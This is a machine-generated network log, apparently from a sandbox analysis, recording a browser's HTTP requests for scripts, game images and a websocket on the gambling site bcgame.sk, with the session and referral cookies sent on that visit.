            Source: global trafficHTTP traffic detected: GET /test/?p=011923633b743 HTTP/1.1Host: socket2v2.bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://bcgame.skSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://bcgame.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; _gcl_au=1.1.1585837980.1727486212
            Source: global trafficHTTP traffic detected: GET /assets/common/ban.png HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bcgame.sk/?spin=true&i=p3uc729n&utm_source=p3uc729nAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3; _gcl_au=1.1.1585837980.1727486212
            Source: global trafficHTTP traffic detected: GET /modules/account2/assets/init-b19e21e0.js HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bcgame.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://bcgame.sk/modules/account2/assets/manifest-e71017e8.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3; _gcl_au=1.1.1585837980.1727486212
            Source: global trafficHTTP traffic detected: GET /modules/bonus2/assets/init-433d720f.js HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bcgame.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://bcgame.sk/modules/bonus2/assets/manifest-51a3674f.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3; _gcl_au=1.1.1585837980.1727486212
            Source: global trafficHTTP traffic detected: GET /assets/js/fp.min.js HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bcgame.sk/?spin=true&i=p3uc729n&utm_source=p3uc729nAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /modules/lottery2/assets/UpcomingDrawSection-87ed187d.js HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bcgame.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3; _gcl_au=1.1.1585837980.1727486212
            Source: global trafficHTTP traffic detected: GET /game/image/b5e0fa00d9.png?_v=4&w=100&auto=format&cs=tinysrgb&blur=100 HTTP/1.1Host: bc.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bcgame.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /game/image/b5e0fa00d9.png?_v=4&auto=format&dpr=1&w=200 HTTP/1.1Host: bc.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bcgame.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /game/image/a131ebc530.png?_v=4&auto=format&dpr=1&w=200 HTTP/1.1Host: bc.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bcgame.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /socket.io/?Accept-Language=en&EIO=3&transport=websocket HTTP/1.1Host: socketv2.bcgame.skConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://bcgame.skSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; _gcl_au=1.1.1585837980.1727486212Sec-WebSocket-Key: qDzkE7qBuE8ZCEhTU7B5xw==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /game/image/4f7e7099e6.png?_v=4&auto=format&dpr=1&w=200 HTTP/1.1Host: bc.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bcgame.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /modules/lottery2/assets/solid-js-8ff414d5.js HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bcgame.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3; _gcl_au=1.1.1585837980.1727486212
            Source: global trafficHTTP traffic detected: GET /game/image/15935_Sugar%20rush%201000.png?_v=4&auto=format&dpr=1&w=200 HTTP/1.1Host: bc.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bcgame.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /modules/lottery2/assets/currency-47f1b68e.js HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bcgame.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3; _gcl_au=1.1.1585837980.1727486212
            Source: global trafficHTTP traffic detected: GET /modules/lottery2/assets/index-1cecafc8.js HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bcgame.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3; _gcl_au=1.1.1585837980.1727486212
            Source: global trafficHTTP traffic detected: GET /game/image/90ba079bba.png?_v=4&auto=format&dpr=1&w=200 HTTP/1.1Host: bc.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bcgame.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /modules/lottery2/assets/CountryAvatar-04e11269.js HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bcgame.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3; _gcl_au=1.1.1585837980.1727486212
            Source: global trafficHTTP traffic detected: GET /modules/lottery2/assets/countries-18533370.js HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bcgame.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3; _gcl_au=1.1.1585837980.1727486212
            Source: global trafficHTTP traffic detected: GET /modules/lottery2/assets/lottery-9c791aba.js HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bcgame.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3; _gcl_au=1.1.1585837980.1727486212
            Source: global trafficHTTP traffic detected: GET /game/image/e992b8c2a1.png?_v=4&w=100&auto=format&cs=tinysrgb&blur=100 HTTP/1.1Host: bc.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bcgame.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /game/image/d927716dbf.png?_v=4&auto=format&dpr=1&w=200 HTTP/1.1Host: bc.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bcgame.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /modules/lottery2/assets/i18n-e6eba74a.js HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bcgame.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3; _gcl_au=1.1.1585837980.1727486212
            Source: global trafficHTTP traffic detected: GET /modules/lottery2/assets/throttle-e4f3954e.js HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bcgame.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3; _gcl_au=1.1.1585837980.1727486212
            Source: global trafficHTTP traffic detected: GET /game/image/13106_The%20Zeus%20vs%20Hades.png?_v=4&auto=format&dpr=1&w=200 HTTP/1.1Host: bc.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bcgame.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
